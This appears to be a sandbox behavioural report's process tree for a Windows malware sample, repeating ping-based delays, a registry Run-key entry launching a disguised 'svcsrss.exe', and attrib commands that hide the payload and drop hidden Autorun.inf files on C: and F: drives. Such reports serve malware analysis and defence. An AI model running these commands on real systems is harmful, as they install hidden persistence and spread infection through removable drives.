C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2316
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2744
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2628
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3060
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2852
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:1968
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:1948
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2896
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2924
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1676
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2960
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:1752
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2624
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2500
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1524
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:588
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1672
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System /t REG_SZ /d "C:\Windows\system32\svcsrss.exe" /f3⤵
- Adds Run key to start application
PID:2012
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1480
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1416
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1476
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\svcsrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1096
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h C:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:2016
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:1364
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:1208
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2068
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h F:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:2300
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:628
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:2088
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3008
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1552
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2096
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1128
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:1544
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1536
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1300
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:536
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1184
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2444
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:1776
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:320
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:1720
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:556
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1712
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:980
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:1944
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:1656
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2284
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1604
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System /t REG_SZ /d "C:\Windows\system32\svcsrss.exe" /f3⤵
- Adds Run key to start application
PID:2720
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2612
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\svcsrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2952
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2316
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2584
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h C:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:2600
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:1740
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:3044
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:1036
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2520
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h F:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:2956
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:2480
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2908
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2280
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1620
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:1652
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1636
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2500
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1984
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2372
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:860
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1096
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1228
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1496
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1352
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2764
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2320
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2296
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1856
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2364
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2080
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:904
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System /t REG_SZ /d "C:\Windows\system32\svcsrss.exe" /f3⤵
- Adds Run key to start application
PID:2532
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:764
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\svcsrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2360
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2336
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1544
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h C:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:1536
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:1864
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1848
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1716
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:312
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h F:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:696
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:2168
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2552
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1960
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2140
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1712
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2872
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:1956
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2848
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1608
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2072
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2976
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2160
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2436
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2596
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:3064
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1780
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1964
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2884
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2936
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2948
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2892
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System /t REG_SZ /d "C:\Windows\system32\svcsrss.exe" /f3⤵
- Adds Run key to start application
PID:2964
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2264
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\svcsrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2652
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1640
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:1752
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h C:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:1756
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:532
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:1648
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:728
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:576
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h F:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:436
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:1516
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1212
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2352
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2056
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1080
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2312
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1728
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2100
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1248
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2268
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2496
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1076
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1952
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2532
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1764
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:1768
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1748
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1048
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1152
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1716
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:312
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System /t REG_SZ /d "C:\Windows\system32\svcsrss.exe" /f3⤵
- Adds Run key to start application
PID:2204
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2224
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\svcsrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2168
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:876
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2180
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h C:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:1644
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:2864
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2124
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:268
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1704
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h F:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:2288
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:1664
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2292
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2820
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2640
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2636
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2604
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1788
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1808
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1948
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2912
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2120
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2460
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2948
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2892
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:1556
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2960
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2172
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2164
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1812
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1668
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2012
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System /t REG_SZ /d "C:\Windows\system32\svcsrss.exe" /f3⤵
- Adds Run key to start application
PID:1096
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1064
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\svcsrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1684
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:756
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1364
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h C:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:2244
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:2056
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2064
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1804
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2068
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h F:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:2996
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:1072
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2368
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2192
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2364
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:628
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:904
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:1052
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2492
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2824
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2472
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:1864
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:1616
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2104
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1772
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2232
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:312
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2508
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:928
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1724
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2140
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2864
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System /t REG_SZ /d "C:\Windows\system32\svcsrss.exe" /f3⤵
- Adds Run key to start application
PID:1920
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:980
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\svcsrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1596
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2684
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:3016
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h C:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:2136
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:2612
-
-
